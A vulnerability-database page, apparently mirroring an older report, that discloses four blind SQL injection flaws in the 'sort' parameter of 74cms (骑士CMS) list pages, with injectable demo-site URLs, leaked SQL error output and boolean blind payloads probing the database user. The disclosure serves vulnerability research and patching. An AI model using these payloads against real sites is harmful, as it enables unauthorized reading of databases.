|骑士CMS某新功能4处SQL注入 - VULHUB开源网络安全威胁库

骑士CMS某新功能4处SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：骑士CMS官网某新功能4处SQL盲注，官网测试。 ### 详细说明：官网培训信息搜索和猎头工作搜索等4处SQL盲注。 0x01: 当前位置：首页 > 教育培训 > 课程列表搜索课程 ``` http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key= ``` 参数sort存在SQL注入,desc后面的字符串全部带入SQL： ``` http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc%27&key= ``` 插入',返回错误： ``` Error：Query error:SELECT * FROM qs_course WHERE audit=1 AND display=1 AND add_mode=1 ORDER BY click desc\' LIMIT 0 , 10 ``` [<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png) 盲注： TRUE的情况： ``` http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key= ``` [<img src="https://images.seebug.org/upload/201411/03140342dded30ec056ed69a637cded321343ae8.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140342dded30ec056ed69a637cded321343ae8.png) FALSE的情况： ``` http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key= ``` [<img src="https://images.seebug.org/upload/201411/03140428258e48a6dc063c3b4d93e6c1ac3f9545.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140428258e48a6dc063c3b4d93e6c1ac3f9545.png) 0x02: 当前位置：首页 > 教育培训 > 机构列表机构列表 ``` http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc ``` sort参数存在SQL注入： ``` http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc%27 ``` 插入',返回SQL错误： ``` Error：Query error:SELECT * FROM qs_train_profile ORDER BY click desc\' LIMIT 0 , 10 ``` [<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png) 盲注TRUE的情况： ``` http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23 ``` [<img src="https://images.seebug.org/upload/201411/03140751f2c40645b5709a0a98bc8a567a6c10b2.png" alt="21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140751f2c40645b5709a0a98bc8a567a6c10b2.png) FALSE的情况： [<img src="https://images.seebug.org/upload/201411/03140811a089d15d088e07d8acb2d62a722741e0.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140811a089d15d088e07d8acb2d62a722741e0.png) 0x03:当前位置：首页 > 教育培训 > 讲师列表讲师列表 ``` http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc&inforow= ``` sort参数存在SQL注入： ``` http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc%27&inforow= ``` 返回SQL错误： ``` Error：Query error:SELECT * FROM qs_train_teachers WHERE audit=1 ORDER BY click desc\' LIMIT 0 , 10 ``` [<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png) 盲注TRUE的情况： ``` http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow= ``` [<img src="https://images.seebug.org/upload/201411/0314123278a8a0b82c3dd84914b8a8ead773a626.png" alt="31.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0314123278a8a0b82c3dd84914b8a8ead773a626.png) FALSE： ``` http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow= ``` [<img src="https://images.seebug.org/upload/201411/031413246b3ccea64137096a4b5913c1559ab4e4.png" alt="32.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/031413246b3ccea64137096a4b5913c1559ab4e4.png) 0x04:当前位置：首页 > 高级招聘信息 > 搜索结果搜索方式 : 全能搜索 ``` http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature= ``` sort存在SQL注入，注入'： ``` http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc%27&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature= ``` 返回SQL错误： ``` Error：Query error:SELECT * FROM qs_hunter_jobs ORDER BY click desc\' LIMIT 0 , 10 ``` [<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png) 盲注TRUE： ``` http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature= ``` [<img src="https://images.seebug.org/upload/201411/0314160673a379a35d490946c9fdc1eef7c8a256.png" alt="41.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0314160673a379a35d490946c9fdc1eef7c8a256.png) FALSE： ``` http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature= ``` [<img src="https://images.seebug.org/upload/201411/031416489979806f120d24b373d19b11b8e4c129.png" alt="42.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/031416489979806f120d24b373d19b11b8e4c129.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png) [<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png) [<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png) [<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™